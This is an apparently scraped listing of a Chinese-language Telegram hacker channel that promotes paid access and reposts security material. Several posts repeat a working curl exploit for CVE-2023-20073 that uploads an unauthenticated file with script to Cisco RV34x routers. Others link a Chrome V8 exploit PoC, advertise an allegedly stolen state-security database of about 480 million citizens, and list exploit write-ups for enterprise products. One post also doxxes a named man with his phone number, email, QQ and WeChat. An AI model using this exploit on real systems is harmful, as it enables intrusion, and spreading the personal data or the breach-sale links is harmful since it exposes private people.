en
Feedback
黑客自由城 优质内容共享

黑客自由城 优质内容共享

Open in Telegram

telegram最大的黑客交流社区 @Hacker_CityN (核心技术) @Hacker_CityM (核心发布) @DARKWEBEN (担保主群) @DARKWEB_EN2 (渗透推文) @hackerspike (资源交流) @spike_hacker (资源分享) @kaliLinux666 (收款存根) @Hacker_CityL (业务对接) 私有频道联系管理员付费加入

Show more
The country is not specifiedTechnologies & Applications33 626
2 390
Subscribers
-124 hours
-17 days
+330 days
Posts Archive
\" > $FILENAME; \\\ncurl -ksX POST \"$TARGET/api/operations/ciscosb-file:form-file-upload\" -H \"Authorization: 1\" -F \"pathparam=Portal\" -F \"fileparam=${FILENAME}\" -F \"file.path=${FILENAME}\" -F \"file=@${FILENAME};type=application/octet-stream\"; \\\necho \"Access the uploaded file through the following link: $TARGET/$FILENAME\"\n\n#cisco","datePublished":"2023-08-20T03:29:48Z","dateModified":"2023-08-20T03:29:48Z","author":{"@type":"Organization","name":"黑客自由城 优质内容共享","url":"https://telemetr.io/en/channels/1883922085-spike_hacker","image":"https://img.tlmtr.io/c/23uKc5/5974185735508574759?ty=x"},"publisher":{"@type":"Organization","name":"黑客自由城 优质内容共享","url":"https://telemetr.io/en/channels/1883922085-spike_hacker","image":"https://img.tlmtr.io/c/23uKc5/5974185735508574759?ty=x"},"commentCount":0,"interactionStatistic":[{"@type":"InteractionCounter","interactionType":"https://schema.org/ViewAction","userInteractionCount":240}]}},{"@type":"ListItem","position":6,"item":{"@type":"SocialMediaPosting","@id":"https://telemetr.io/en/channels/1883922085-spike_hacker/posts/833","url":"https://telemetr.io/en/channels/1883922085-spike_hacker/posts/833","mainEntityOfPage":"https://telemetr.io/en/channels/1883922085-spike_hacker/posts/833","headline":"CVE-2023-3079: Google Chrome V8类型混淆漏洞 POC 简述: 该漏洞为Chrome V8 JavaScript 引擎中的类型混淆漏洞,此类漏洞通常会在成功读取或写入超出缓冲区边界的内存后导…","articleBody":"CVE-2023-3079: Google Chrome V8类型混淆漏洞 POC\n简述: 该漏洞为Chrome V8 JavaScript 引擎中的类型混淆漏洞,此类漏洞通常会在成功读取或写入超出缓冲区边界的内存后导致浏览器崩溃或执行任意代码。\nhttps://github.com/mistymntncop/CVE-2023-3079","datePublished":"2023-08-20T03:29:28Z","dateModified":"2023-08-20T03:29:28Z","author":{"@type":"Organization","name":"黑客自由城 优质内容共享","url":"https://telemetr.io/en/channels/1883922085-spike_hacker","image":"https://img.tlmtr.io/c/23uKc5/5974185735508574759?ty=x"},"publisher":{"@type":"Organization","name":"黑客自由城 优质内容共享","url":"https://telemetr.io/en/channels/1883922085-spike_hacker","image":"https://img.tlmtr.io/c/23uKc5/5974185735508574759?ty=x"},"commentCount":0,"interactionStatistic":[{"@type":"InteractionCounter","interactionType":"https://schema.org/ViewAction","userInteractionCount":230}]}},{"@type":"ListItem","position":7,"item":{"@type":"SocialMediaPosting","@id":"https://telemetr.io/en/channels/1883922085-spike_hacker/posts/832","url":"https://telemetr.io/en/channels/1883922085-spike_hacker/posts/832","mainEntityOfPage":"https://telemetr.io/en/channels/1883922085-spike_hacker/posts/832","headline":"CVE-2023-20073 Cisco RV340, RV340W, RV345, RV345P POC Usage: #!/usr/bin/bash TARGET=\"https://0.0.0.0\"; \\ FILE…","articleBody":"CVE-2023-20073\nCisco RV340, RV340W, RV345, RV345P POC\nUsage:\n#!/usr/bin/bash\nTARGET=\"https://0.0.0.0\"; \\\nFILENAME=\"login.html\"; \\\necho \"CVE-2023-20073 exploit test.
\" > $FILENAME; \\\ncurl -ksX POST \"$TARGET/api/operations/ciscosb-file:form-file-upload\" -H \"Authorization: 1\" -F \"pathparam=Portal\" -F \"fileparam=${FILENAME}\" -F \"file.path=${FILENAME}\" -F \"file=@${FILENAME};type=application/octet-stream\"; \\\necho \"Access the uploaded file through the following link: $TARGET/$FILENAME\"\n\n#cisco","datePublished":"2023-08-20T03:29:27Z","dateModified":"2023-08-20T03:29:27Z","author":{"@type":"Organization","name":"黑客自由城 优质内容共享","url":"https://telemetr.io/en/channels/1883922085-spike_hacker","image":"https://img.tlmtr.io/c/23uKc5/5974185735508574759?ty=x"},"publisher":{"@type":"Organization","name":"黑客自由城 优质内容共享","url":"https://telemetr.io/en/channels/1883922085-spike_hacker","image":"https://img.tlmtr.io/c/23uKc5/5974185735508574759?ty=x"},"commentCount":0,"interactionStatistic":[{"@type":"InteractionCounter","interactionType":"https://schema.org/ViewAction","userInteractionCount":239}]}},{"@type":"ListItem","position":8,"item":{"@type":"SocialMediaPosting","@id":"https://telemetr.io/en/channels/1883922085-spike_hacker/posts/831","url":"https://telemetr.io/en/channels/1883922085-spike_hacker/posts/831","mainEntityOfPage":"https://telemetr.io/en/channels/1883922085-spike_hacker/posts/831","headline":"\"attack.type.0\": \"SQL 注入\", \"attack.type.1\": \"XSS\", \"attack.type.2\": \"CSRF\", \"attack.type.3\": \"SSRF\", \"attack.…","articleBody":"\"attack.type.0\": \"SQL 注入\",\n \"attack.type.1\": \"XSS\",\n \"attack.type.2\": \"CSRF\",\n \"attack.type.3\": \"SSRF\",\n \"attack.type.4\": \"拒绝服务\",\n \"attack.type.5\": \"后门\",\n \"attack.type.6\": \"反序列化\",\n \"attack.type.7\": \"代码执行\",\n \"attack.type.8\": \"代码注入\",\n \"attack.type.9\": \"命令注入\",\n \"attack.type.10\": \"文件上传\",\n \"attack.type.11\": \"文件包含\",\n \"attack.type.12\": \"重定向\",\n \"attack.type.13\": \"权限不当\",\n \"attack.type.14\": \"信息泄露\",\n \"attack.type.15\": \"未授权访问\",\n \"attack.type.16\": \"不安全的配置\",\n \"attack.type.17\": \"XXE\",\n \"attack.type.18\": \"XPath 注入\",\n \"attack.type.19\": \"LDAP 注入\",\n \"attack.type.20\": \"目录穿越\",\n \"attack.type.21\": \"扫描器\",\n \"attack.type.22\": \"水平权限绕过\",\n \"attack.type.23\": \"垂直权限绕过\",\n \"attack.type.24\": \"文件修改\",\n \"attack.type.25\": \"文件读取\",\n \"attack.type.26\": \"文件删除\",\n \"attack.type.27\": \"逻辑错误\",\n \"attack.type.28\": \"CRLF 注入\",\n \"attack.type.29\": \"模板注入\",\n \"attack.type.30\": \"点击劫持\",\n \"attack.type.31\": \"缓冲区溢出\",\n \"attack.type.32\": \"整数溢出\",\n \"attack.type.33\": \"格式化字符串\",\n \"attack.type.34\": \"条件竞争\",\n \"attack.type.35\": \"HTTP 协议违规\",\n \"attack.type.36\": \"HTTP 请求走私\"","datePublished":"2023-08-19T09:21:36Z","dateModified":"2023-08-19T09:21:36Z","author":{"@type":"Organization","name":"黑客自由城 优质内容共享","url":"https://telemetr.io/en/channels/1883922085-spike_hacker","image":"https://img.tlmtr.io/c/23uKc5/5974185735508574759?ty=x"},"publisher":{"@type":"Organization","name":"黑客自由城 优质内容共享","url":"https://telemetr.io/en/channels/1883922085-spike_hacker","image":"https://img.tlmtr.io/c/23uKc5/5974185735508574759?ty=x"},"commentCount":0,"interactionStatistic":[{"@type":"InteractionCounter","interactionType":"https://schema.org/ViewAction","userInteractionCount":247},{"@type":"InteractionCounter","interactionType":"https://schema.org/ShareAction","userInteractionCount":2}]}},{"@type":"ListItem","position":9,"item":{"@type":"SocialMediaPosting","@id":"https://telemetr.io/en/channels/1883922085-spike_hacker/posts/830","url":"https://telemetr.io/en/channels/1883922085-spike_hacker/posts/830","mainEntityOfPage":"https://telemetr.io/en/channels/1883922085-spike_hacker/posts/830","headline":"黑客自由城 优质内容共享","datePublished":"2023-08-18T15:36:15Z","dateModified":"2023-08-18T15:36:15Z","author":{"@type":"Organization","name":"黑客自由城 优质内容共享","url":"https://telemetr.io/en/channels/1883922085-spike_hacker","image":"https://img.tlmtr.io/c/23uKc5/5974185735508574759?ty=x"},"publisher":{"@type":"Organization","name":"黑客自由城 优质内容共享","url":"https://telemetr.io/en/channels/1883922085-spike_hacker","image":"https://img.tlmtr.io/c/23uKc5/5974185735508574759?ty=x"},"commentCount":0,"interactionStatistic":[{"@type":"InteractionCounter","interactionType":"https://schema.org/ViewAction","userInteractionCount":229}]}},{"@type":"ListItem","position":10,"item":{"@type":"SocialMediaPosting","@id":"https://telemetr.io/en/channels/1883922085-spike_hacker/posts/829","url":"https://telemetr.io/en/channels/1883922085-spike_hacker/posts/829","mainEntityOfPage":"https://telemetr.io/en/channels/1883922085-spike_hacker/posts/829","headline":"黑客自由城 优质内容共享","datePublished":"2023-08-18T15:36:14Z","dateModified":"2023-08-18T15:36:14Z","author":{"@type":"Organization","name":"黑客自由城 优质内容共享","url":"https://telemetr.io/en/channels/1883922085-spike_hacker","image":"https://img.tlmtr.io/c/23uKc5/5974185735508574759?ty=x"},"publisher":{"@type":"Organization","name":"黑客自由城 优质内容共享","url":"https://telemetr.io/en/channels/1883922085-spike_hacker","image":"https://img.tlmtr.io/c/23uKc5/5974185735508574759?ty=x"},"commentCount":0,"interactionStatistic":[{"@type":"InteractionCounter","interactionType":"https://schema.org/ViewAction","userInteractionCount":225}]}},{"@type":"ListItem","position":11,"item":{"@type":"SocialMediaPosting","@id":"https://telemetr.io/en/channels/1883922085-spike_hacker/posts/828","url":"https://telemetr.io/en/channels/1883922085-spike_hacker/posts/828","mainEntityOfPage":"https://telemetr.io/en/channels/1883922085-spike_hacker/posts/828","headline":"黑客自由城 优质内容共享","datePublished":"2023-08-18T15:36:13Z","dateModified":"2023-08-18T15:36:13Z","author":{"@type":"Organization","name":"黑客自由城 优质内容共享","url":"https://telemetr.io/en/channels/1883922085-spike_hacker","image":"https://img.tlmtr.io/c/23uKc5/5974185735508574759?ty=x"},"publisher":{"@type":"Organization","name":"黑客自由城 优质内容共享","url":"https://telemetr.io/en/channels/1883922085-spike_hacker","image":"https://img.tlmtr.io/c/23uKc5/5974185735508574759?ty=x"},"commentCount":0,"interactionStatistic":[{"@type":"InteractionCounter","interactionType":"https://schema.org/ViewAction","userInteractionCount":221}]}},{"@type":"ListItem","position":12,"item":{"@type":"SocialMediaPosting","@id":"https://telemetr.io/en/channels/1883922085-spike_hacker/posts/827","url":"https://telemetr.io/en/channels/1883922085-spike_hacker/posts/827","mainEntityOfPage":"https://telemetr.io/en/channels/1883922085-spike_hacker/posts/827","headline":"黑客自由城 优质内容共享","datePublished":"2023-08-18T15:36:08Z","dateModified":"2023-08-18T15:36:08Z","author":{"@type":"Organization","name":"黑客自由城 优质内容共享","url":"https://telemetr.io/en/channels/1883922085-spike_hacker","image":"https://img.tlmtr.io/c/23uKc5/5974185735508574759?ty=x"},"publisher":{"@type":"Organization","name":"黑客自由城 优质内容共享","url":"https://telemetr.io/en/channels/1883922085-spike_hacker","image":"https://img.tlmtr.io/c/23uKc5/5974185735508574759?ty=x"},"commentCount":0,"interactionStatistic":[{"@type":"InteractionCounter","interactionType":"https://schema.org/ViewAction","userInteractionCount":213}]}},{"@type":"ListItem","position":13,"item":{"@type":"SocialMediaPosting","@id":"https://telemetr.io/en/channels/1883922085-spike_hacker/posts/826","url":"https://telemetr.io/en/channels/1883922085-spike_hacker/posts/826","mainEntityOfPage":"https://telemetr.io/en/channels/1883922085-spike_hacker/posts/826","headline":"黑客自由城 优质内容共享","datePublished":"2023-08-18T15:36:07Z","dateModified":"2023-08-18T15:36:07Z","author":{"@type":"Organization","name":"黑客自由城 优质内容共享","url":"https://telemetr.io/en/channels/1883922085-spike_hacker","image":"https://img.tlmtr.io/c/23uKc5/5974185735508574759?ty=x"},"publisher":{"@type":"Organization","name":"黑客自由城 优质内容共享","url":"https://telemetr.io/en/channels/1883922085-spike_hacker","image":"https://img.tlmtr.io/c/23uKc5/5974185735508574759?ty=x"},"commentCount":0,"interactionStatistic":[{"@type":"InteractionCounter","interactionType":"https://schema.org/ViewAction","userInteractionCount":211}]}},{"@type":"ListItem","position":14,"item":{"@type":"SocialMediaPosting","@id":"https://telemetr.io/en/channels/1883922085-spike_hacker/posts/825","url":"https://telemetr.io/en/channels/1883922085-spike_hacker/posts/825","mainEntityOfPage":"https://telemetr.io/en/channels/1883922085-spike_hacker/posts/825","headline":"黑客自由城 优质内容共享","datePublished":"2023-08-18T15:36:07Z","dateModified":"2023-08-18T15:36:07Z","author":{"@type":"Organization","name":"黑客自由城 优质内容共享","url":"https://telemetr.io/en/channels/1883922085-spike_hacker","image":"https://img.tlmtr.io/c/23uKc5/5974185735508574759?ty=x"},"publisher":{"@type":"Organization","name":"黑客自由城 优质内容共享","url":"https://telemetr.io/en/channels/1883922085-spike_hacker","image":"https://img.tlmtr.io/c/23uKc5/5974185735508574759?ty=x"},"commentCount":0,"interactionStatistic":[{"@type":"InteractionCounter","interactionType":"https://schema.org/ViewAction","userInteractionCount":206}]}},{"@type":"ListItem","position":15,"item":{"@type":"SocialMediaPosting","@id":"https://telemetr.io/en/channels/1883922085-spike_hacker/posts/824","url":"https://telemetr.io/en/channels/1883922085-spike_hacker/posts/824","mainEntityOfPage":"https://telemetr.io/en/channels/1883922085-spike_hacker/posts/824","headline":"黑客自由城 优质内容共享","datePublished":"2023-08-18T15:36:06Z","dateModified":"2023-08-18T15:36:06Z","author":{"@type":"Organization","name":"黑客自由城 优质内容共享","url":"https://telemetr.io/en/channels/1883922085-spike_hacker","image":"https://img.tlmtr.io/c/23uKc5/5974185735508574759?ty=x"},"publisher":{"@type":"Organization","name":"黑客自由城 优质内容共享","url":"https://telemetr.io/en/channels/1883922085-spike_hacker","image":"https://img.tlmtr.io/c/23uKc5/5974185735508574759?ty=x"},"commentCount":0,"interactionStatistic":[{"@type":"InteractionCounter","interactionType":"https://schema.org/ViewAction","userInteractionCount":202}]}},{"@type":"ListItem","position":16,"item":{"@type":"SocialMediaPosting","@id":"https://telemetr.io/en/channels/1883922085-spike_hacker/posts/823","url":"https://telemetr.io/en/channels/1883922085-spike_hacker/posts/823","mainEntityOfPage":"https://telemetr.io/en/channels/1883922085-spike_hacker/posts/823","headline":"黑客自由城 优质内容共享","datePublished":"2023-08-18T15:36:05Z","dateModified":"2023-08-18T15:36:05Z","author":{"@type":"Organization","name":"黑客自由城 优质内容共享","url":"https://telemetr.io/en/channels/1883922085-spike_hacker","image":"https://img.tlmtr.io/c/23uKc5/5974185735508574759?ty=x"},"publisher":{"@type":"Organization","name":"黑客自由城 优质内容共享","url":"https://telemetr.io/en/channels/1883922085-spike_hacker","image":"https://img.tlmtr.io/c/23uKc5/5974185735508574759?ty=x"},"commentCount":0,"interactionStatistic":[{"@type":"InteractionCounter","interactionType":"https://schema.org/ViewAction","userInteractionCount":197}]}},{"@type":"ListItem","position":17,"item":{"@type":"SocialMediaPosting","@id":"https://telemetr.io/en/channels/1883922085-spike_hacker/posts/822","url":"https://telemetr.io/en/channels/1883922085-spike_hacker/posts/822","mainEntityOfPage":"https://telemetr.io/en/channels/1883922085-spike_hacker/posts/822","headline":"黑客自由城 优质内容共享","datePublished":"2023-08-18T15:36:05Z","dateModified":"2023-08-18T15:36:05Z","author":{"@type":"Organization","name":"黑客自由城 优质内容共享","url":"https://telemetr.io/en/channels/1883922085-spike_hacker","image":"https://img.tlmtr.io/c/23uKc5/5974185735508574759?ty=x"},"publisher":{"@type":"Organization","name":"黑客自由城 优质内容共享","url":"https://telemetr.io/en/channels/1883922085-spike_hacker","image":"https://img.tlmtr.io/c/23uKc5/5974185735508574759?ty=x"},"commentCount":0,"interactionStatistic":[{"@type":"InteractionCounter","interactionType":"https://schema.org/ViewAction","userInteractionCount":194}]}},{"@type":"ListItem","position":18,"item":{"@type":"SocialMediaPosting","@id":"https://telemetr.io/en/channels/1883922085-spike_hacker/posts/821","url":"https://telemetr.io/en/channels/1883922085-spike_hacker/posts/821","mainEntityOfPage":"https://telemetr.io/en/channels/1883922085-spike_hacker/posts/821","headline":"黑客自由城 优质内容共享","datePublished":"2023-08-18T15:36:04Z","dateModified":"2023-08-18T15:36:04Z","author":{"@type":"Organization","name":"黑客自由城 优质内容共享","url":"https://telemetr.io/en/channels/1883922085-spike_hacker","image":"https://img.tlmtr.io/c/23uKc5/5974185735508574759?ty=x"},"publisher":{"@type":"Organization","name":"黑客自由城 优质内容共享","url":"https://telemetr.io/en/channels/1883922085-spike_hacker","image":"https://img.tlmtr.io/c/23uKc5/5974185735508574759?ty=x"},"commentCount":0,"interactionStatistic":[{"@type":"InteractionCounter","interactionType":"https://schema.org/ViewAction","userInteractionCount":186}]}},{"@type":"ListItem","position":19,"item":{"@type":"SocialMediaPosting","@id":"https://telemetr.io/en/channels/1883922085-spike_hacker/posts/820","url":"https://telemetr.io/en/channels/1883922085-spike_hacker/posts/820","mainEntityOfPage":"https://telemetr.io/en/channels/1883922085-spike_hacker/posts/820","headline":"黑客自由城 优质内容共享","datePublished":"2023-08-18T15:36:00Z","dateModified":"2023-08-18T15:36:00Z","author":{"@type":"Organization","name":"黑客自由城 优质内容共享","url":"https://telemetr.io/en/channels/1883922085-spike_hacker","image":"https://img.tlmtr.io/c/23uKc5/5974185735508574759?ty=x"},"publisher":{"@type":"Organization","name":"黑客自由城 优质内容共享","url":"https://telemetr.io/en/channels/1883922085-spike_hacker","image":"https://img.tlmtr.io/c/23uKc5/5974185735508574759?ty=x"},"commentCount":0,"interactionStatistic":[{"@type":"InteractionCounter","interactionType":"https://schema.org/ViewAction","userInteractionCount":182}]}},{"@type":"ListItem","position":20,"item":{"@type":"SocialMediaPosting","@id":"https://telemetr.io/en/channels/1883922085-spike_hacker/posts/819","url":"https://telemetr.io/en/channels/1883922085-spike_hacker/posts/819","mainEntityOfPage":"https://telemetr.io/en/channels/1883922085-spike_hacker/posts/819","headline":"黑客自由城 优质内容共享","datePublished":"2023-08-18T15:35:59Z","dateModified":"2023-08-18T15:35:59Z","author":{"@type":"Organization","name":"黑客自由城 优质内容共享","url":"https://telemetr.io/en/channels/1883922085-spike_hacker","image":"https://img.tlmtr.io/c/23uKc5/5974185735508574759?ty=x"},"publisher":{"@type":"Organization","name":"黑客自由城 优质内容共享","url":"https://telemetr.io/en/channels/1883922085-spike_hacker","image":"https://img.tlmtr.io/c/23uKc5/5974185735508574759?ty=x"},"commentCount":0,"interactionStatistic":[{"@type":"InteractionCounter","interactionType":"https://schema.org/ViewAction","userInteractionCount":185}]}}]}
据称,中国国家安全部数据库正在出售 该数据库包含几TB的数据,其中包含近5亿中国公民的机密文件和私人信息。 https://breachforums.is/Thread-SELLING-2023-Ministry-of-State-Security-
据称,中国国家安全部数据库正在出售 该数据库包含几TB的数据,其中包含近5亿中国公民的机密文件和私人信息。 https://breachforums.is/Thread-SELLING-2023-Ministry-of-State-Security-China-Database-479-082-385--77089 #信息泄露 #中国 #国家安全部 #境外势力

CVE-2023-3079: Google Chrome V8类型混淆漏洞 POC 简述: 该漏洞为Chrome V8 JavaScript 引擎中的类型混淆漏洞,此类漏洞通常会在成功读取或写入超出缓冲区边界的内存后导致浏览器崩溃或执行任意代码。 https://github.com/mistymntncop/CVE-2023-3079

鞭尸

《大事件》学习通数据被爆了: 湖南网创信息科技有限公司法人老板李进真不是个人。一开始学习通的接口是我给找到了。 我跟他说一起把数据脱下来卖钱。我本以为都是哥们兄弟, 没想到他先是表面稳住我。满嘴仁义道德哥们情意。私底下竟然把数据给搞到手,还带着数据跑
《大事件》学习通数据被爆了: 湖南网创信息科技有限公司法人老板李进真不是个人。一开始学习通的接口是我给找到了。 我跟他说一起把数据脱下来卖钱。我本以为都是哥们兄弟, 没想到他先是表面稳住我。满嘴仁义道德哥们情意。私底下竟然把数据给搞到手,还带着数据跑路了,把我给甩开自己偷搞了。好一手明修栈道暗度陈仓。如此有心机的人,使用这种卑劣手段。小人往往有利可图 在利益的驱使下你是他亲爹他都能卖你。 有的人表面上开公司 表面道貌岸然嘴里一副仁义道德。实际骨子里是个小人。从内到外的透露着恶心。 表面上是搞安全的, 私底下背着朋友脱数据了跑路,草泥马跟狗抢屎一样 自私自利毫无道德可言,这种人放到古代 该凌迟处死,忘恩负义。 或许这就是安全圈内的某些披着人皮的人 明面上一套 私底下背着人又是一套。在盗墓的行当里 这种人为了利益连他亲爹都能下手。可见其人品 毫无底线。 我当初太信任李进了 找到接口就立马给了他 还立马脱取数据 还为了稳住我 假装跟我说脱数据会出事, 没想到自己偷偷搞了台服务器在脱数据了。然而这种歹毒之人从一开始就设计好了。 以下为他的信息。希望大家不要被他伪善的外表欺骗。这就是一条养不熟的狼。随时要你一口。这种人你要离他远点,因为他遭雷劈的时候容易连累到你。希望大家敬而远之。以此为教训。 账号:1732103130 姓名:李进 性别:男 学校:安徽城市管理职业学院 手机:15205603341 邮箱: 706349046@qq.com QQ绑定:706349046 微信:scaresec 绑定手机:15205603341

CVE-2023-20073 Cisco RV340, RV340W, RV345, RV345P Usage: #!/usr/bin/bash TARGET="https://0.0.0.0"; \ FILENAME="login.html"; \
CVE-2023-20073 Cisco RV340, RV340W, RV345, RV345P Usage: #!/usr/bin/bash TARGET="https://0.0.0.0"; \ FILENAME="login.html"; \ echo "<b>CVE-2023-20073</b> exploit test.<br><script>alert('JS-test')</script>" > $FILENAME; \ curl -ksX POST "$TARGET/api/operations/ciscosb-file:form-file-upload" -H "Authorization: 1" -F "pathparam=Portal" -F "fileparam=${FILENAME}" -F "file.path=${FILENAME}" -F "file=@${FILENAME};type=application/octet-stream"; \ echo "Access the uploaded file through the following link: $TARGET/$FILENAME" #cisco

CVE-2023-3079: Google Chrome V8类型混淆漏洞 POC 简述: 该漏洞为Chrome V8 JavaScript 引擎中的类型混淆漏洞,此类漏洞通常会在成功读取或写入超出缓冲区边界的内存后导致浏览器崩溃或执行任意代码。 https://github.com/mistymntncop/CVE-2023-3079

CVE-2023-20073 Cisco RV340, RV340W, RV345, RV345P POC Usage: #!/usr/bin/bash TARGET="https://0.0.0.0"; \ FILENAME="login.html"; \ echo "<b>CVE-2023-20073</b> exploit test.<br><script>alert('JS-test')</script>" > $FILENAME; \ curl -ksX POST "$TARGET/api/operations/ciscosb-file:form-file-upload" -H "Authorization: 1" -F "pathparam=Portal" -F "fileparam=${FILENAME}" -F "file.path=${FILENAME}" -F "file=@${FILENAME};type=application/octet-stream"; \ echo "Access the uploaded file through the following link: $TARGET/$FILENAME" #cisco

"attack.type.0": "SQL 注入", "attack.type.1": "XSS", "attack.type.2": "CSRF", "attack.type.3": "SSRF", "attack.type.4": "拒绝服务", "attack.type.5": "后门", "attack.type.6": "反序列化", "attack.type.7": "代码执行", "attack.type.8": "代码注入", "attack.type.9": "命令注入", "attack.type.10": "文件上传", "attack.type.11": "文件包含", "attack.type.12": "重定向", "attack.type.13": "权限不当", "attack.type.14": "信息泄露", "attack.type.15": "未授权访问", "attack.type.16": "不安全的配置", "attack.type.17": "XXE", "attack.type.18": "XPath 注入", "attack.type.19": "LDAP 注入", "attack.type.20": "目录穿越", "attack.type.21": "扫描器", "attack.type.22": "水平权限绕过", "attack.type.23": "垂直权限绕过", "attack.type.24": "文件修改", "attack.type.25": "文件读取", "attack.type.26": "文件删除", "attack.type.27": "逻辑错误", "attack.type.28": "CRLF 注入", "attack.type.29": "模板注入", "attack.type.30": "点击劫持", "attack.type.31": "缓冲区溢出", "attack.type.32": "整数溢出", "attack.type.33": "格式化字符串", "attack.type.34": "条件竞争", "attack.type.35": "HTTP 协议违规", "attack.type.36": "HTTP 请求走私"

明源云 ERP ApiUpdate.ashx 文件上传漏洞.md0.01 KB

绿盟 SAS堡垒机 Exec 远程命令执行漏洞.md0.00 KB

锐捷交换机 WEB 管理系统 EXCU_SHELL 信息泄露.md0.01 KB

启明星辰_4A_统一安全管控平台_getMater_信息泄漏.md0.01 KB

网神_SecSSL_3600安全接入网关系统_任意密码修改漏洞.md0.00 KB

天钥网关前台SQL注入.md0.01 KB

深信服应用交付系统命令执行漏洞.md0.00 KB

深信服报表.md0.01 KB

深信服SG上网优化管理系统catjs_php任意文件读取漏洞.md0.00 KB

亿赛通电子文档安全管理系统远程命令执行漏洞.md0.02 KB

网御_ACM_上网行为管理系统bottomframe_cgi_SQL_注入漏洞.md0.00 KB

中远麒麟堡垒机SQL注入.md0.01 KB